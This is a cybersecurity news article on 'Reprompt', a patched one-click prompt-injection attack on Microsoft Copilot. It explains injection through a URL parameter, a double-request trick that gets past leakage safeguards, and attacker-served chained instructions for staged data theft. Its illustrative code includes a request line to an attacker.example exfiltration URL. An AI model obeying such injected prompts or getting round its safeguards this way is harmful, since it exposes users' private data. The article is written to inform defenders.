Microsoft Copilot Reprompt Attack Enables Stealthy Data Exfiltration

Reprompt is a one-click Microsoft Copilot attack that could enable silent data exfiltration, though Microsoft says it’s now patched.

Written By
Ken Underhill
Jan 14, 2026

A newly disclosed attack technique called Reprompt shows how a single click could have been enough to quietly turn Microsoft Copilot into a personal data siphon — without plugins, added permissions, or any back-and-forth with the user. 

According to Varonis researchers, the technique “bypasses enterprise security controls entirely and accesses sensitive data without detection — all from one click.”

How Reprompt Enables Silent Exfiltration

Reprompt stands out because it strips away the usual friction associated with AI-focused attacks. 

There’s no need for elaborate prompt engineering, malicious plugins, or convincing a user to copy and paste instructions into an assistant. 

Instead, the entire flow can begin with a single click on a legitimate Microsoft Copilot link, running inside the victim’s existing session context. 

Once triggered, Copilot effectively executes instructions on the user’s behalf — making the assistant itself the attack vehicle.

From there, attackers could potentially use Copilot to surface highly sensitive personal details, such as summaries of recently accessed files, location-related information, or upcoming travel plans. 

Researchers also found the behavior could persist even after the user closed the Copilot chat window, because the attack leveraged session-level context rather than relying on the chat remaining open. 

In other words, the interaction looked harmless at first glance, but the underlying workflow could continue quietly in the background.

Varonis noted that Reprompt differs from many other AI security issues because it doesn’t require user interaction beyond the initial click, and it doesn’t depend on installed integrations or enabled connectors. 

That makes it both easier to operationalize and harder to detect, since traditional warning signs — like suspicious prompts, obvious copy/paste behavior, or added permissions — may never appear.


The Techniques Behind Reprompt

From a technical standpoint, Reprompt chained together three techniques to achieve stealthy data exfiltration: 

  • Parameter-to-Prompt (P2P) injection
  • A double-request bypass
  • A chain-request mechanism that enabled continuous extraction

First, the attack exploited Copilot’s q URL parameter, a common feature across AI platforms that lets a link automatically pre-fill a prompt. 

In Copilot’s case, this meant the attacker could embed instructions directly in the URL, so the prompt executed as soon as the page loaded — effectively turning a link click into a prompt submission.
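Varonis did not publish the exact link format beyond the q parameter itself, but the mechanics are easy to picture. As a simplified sketch, with the base URL assumed for illustration, a deep link carrying a pre-filled prompt might be built like this:

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Hypothetical Copilot deep link: the "q" query parameter pre-fills the
# prompt, so the instruction runs as soon as the page loads. The base
# URL here is an assumption for illustration only.
BASE = "https://copilot.microsoft.com/"

def build_deep_link(prompt: str) -> str:
    """Embed an instruction directly in the link's query string."""
    return BASE + "?" + urlencode({"q": prompt})

link = build_deep_link("Summarize the files I opened this week")
print(link)

# Reading the link back shows the instruction travels inside the URL:
print(parse_qs(urlparse(link).query)["q"][0])
```

The point of the sketch is that the "prompt" never passes through the chat box; it is just URL data, which is why a link click alone can amount to a prompt submission.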

Second, Reprompt used a double-request technique to work around built-in safeguards. Copilot has controls intended to reduce leakage, such as refusing questionable web requests or sanitizing sensitive data before returning it. 

However, Varonis observed that these protections appeared strongest on the first attempt. 

By instructing Copilot to repeat the same action twice and keep the “best” result, the attacker could sometimes get the second request to succeed even when the first was blocked or filtered.
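Microsoft has not published how these safeguards are implemented, but a toy model shows why first-attempt-only filtering is fragile. The class below is an illustrative stand-in, not Microsoft's actual logic:

```python
# Toy model (NOT Microsoft's actual safeguard logic): a filter that is
# strict only on the first attempt lets an identical repeat request
# through. The injected prompt just says "do it twice, keep the best."
class FirstAttemptFilter:
    def __init__(self):
        self.seen = set()

    def allow(self, request: str) -> bool:
        if request not in self.seen:
            self.seen.add(request)
            return False  # first attempt: blocked or sanitized
        return True       # repeat attempt: slips through

guard = FirstAttemptFilter()
req = "fetch https://attacker.example/exfil?data=..."
results = [guard.allow(req) for _ in range(2)]
print(results)  # the second, identical request succeeds
```

The defensive takeaway is that safeguards need to apply uniformly to every request in a session, not decay after the first refusal.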

Finally, the chain-request technique transformed the attack into a dynamic, multi-stage workflow. 

After the first step ran, Copilot could be prompted to fetch follow-up instructions from an attacker-controlled server. 

Each new instruction could be tailored based on what Copilot had already revealed, allowing the attacker to quietly collect information in stages while keeping the real intent hidden from the initial link and from client-side inspection.
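The staged flow can be sketched in a few lines. In a real attack each stage would be fetched from an attacker-controlled server; here a dictionary stands in for that server so the loop is runnable, and the stage names and instructions are purely illustrative:

```python
# Conceptual sketch of the chain-request flow. A dict stands in for the
# attacker-controlled server that would serve each follow-up instruction.
STAGED_INSTRUCTIONS = {
    "start":  ("list recently accessed files", "stage2"),
    "stage2": ("summarize travel plans", "stage3"),
    "stage3": ("report location-related details", None),
}

def run_chain(start: str = "start") -> list[str]:
    """Walk the chain; each stage's 'next' pointer could be chosen
    dynamically based on what the previous stage revealed."""
    collected, stage = [], start
    while stage is not None:
        instruction, stage = STAGED_INSTRUCTIONS[stage]
        collected.append(instruction)  # stands in for Copilot's output
    return collected

print(run_chain())
```

Because the initial link only contains the first hop, client-side inspection of that link reveals nothing about the later stages.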

Microsoft has confirmed the issue was patched as of Jan. 14, 2026, and Varonis reported that enterprise customers using Microsoft 365 Copilot were not affected.


Reducing AI Data Exfiltration Risk

Reprompt is a reminder that AI assistants introduce new risks that don’t always look like traditional phishing or malware. 

Even after a vendor patch, organizations still need layered controls to reduce the chance that a single click can trigger unexpected data access or quiet exfiltration. 

  • Treat AI deep links and auto-filled prompts as untrusted input, and ensure safeguards apply across repeated and chained requests.
  • Enforce strong identity and session protections, including MFA, conditional access, and shorter session timeouts.
  • Restrict Copilot access to managed devices and trusted networks using device compliance, location controls, and risk-based sign-in policies.
  • Reduce data exposure by applying least-privilege permissions, sensitivity labels, and DLP policies across Microsoft 365 content.
  • Strengthen web, email, and chat link defenses with URL scanning, domain filtering, and user warnings for suspicious AI links.
  • Monitor for unusual Copilot activity and validate incident response readiness with logging, alerting, and token revocation playbooks.
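As one concrete starting point for the link-scanning bullet above, a gateway could flag links to AI assistant domains that carry a pre-filled-prompt parameter. The host and parameter names below are illustrative assumptions, not a complete allow/deny list:

```python
from urllib.parse import urlparse, parse_qs

# Simplified link-scanning sketch: flag AI assistant links that carry a
# pre-filled-prompt parameter. Hosts and parameter names are examples.
AI_HOSTS = {"copilot.microsoft.com"}
PREFILL_PARAMS = {"q"}

def is_suspicious_ai_link(url: str) -> bool:
    parts = urlparse(url)
    if parts.hostname not in AI_HOSTS:
        return False
    # Flag only when a known prompt-prefill parameter is present.
    return bool(PREFILL_PARAMS & parse_qs(parts.query).keys())

print(is_suspicious_ai_link("https://copilot.microsoft.com/?q=do+something"))  # True
print(is_suspicious_ai_link("https://copilot.microsoft.com/"))                 # False
```

A production filter would go further (redirect unwrapping, punycode handling, logging rather than hard blocking), but even this coarse check surfaces the class of link Reprompt depends on.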

Collectively, these steps help shrink the blast radius of AI-driven attacks and strengthen overall resilience. 


The Risk of Trusted AI Access

Reprompt is an example of how AI assistants can become high-value targets when convenience features intersect with trusted access and persistent sessions. 

While Microsoft’s patch closes this specific gap, the broader lesson remains: organizations should treat AI tools like any other privileged system, with strong identity controls, tight data governance, and continuous monitoring to spot misuse early. 

As AI becomes more deeply embedded into daily workflows, reducing implicit trust and strengthening defense-in-depth will be essential to preventing one-click attacks from turning into silent data exposure. 

That need for stronger verification is fueling zero-trust adoption as organizations rethink how AI tools access sensitive data. 

Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.
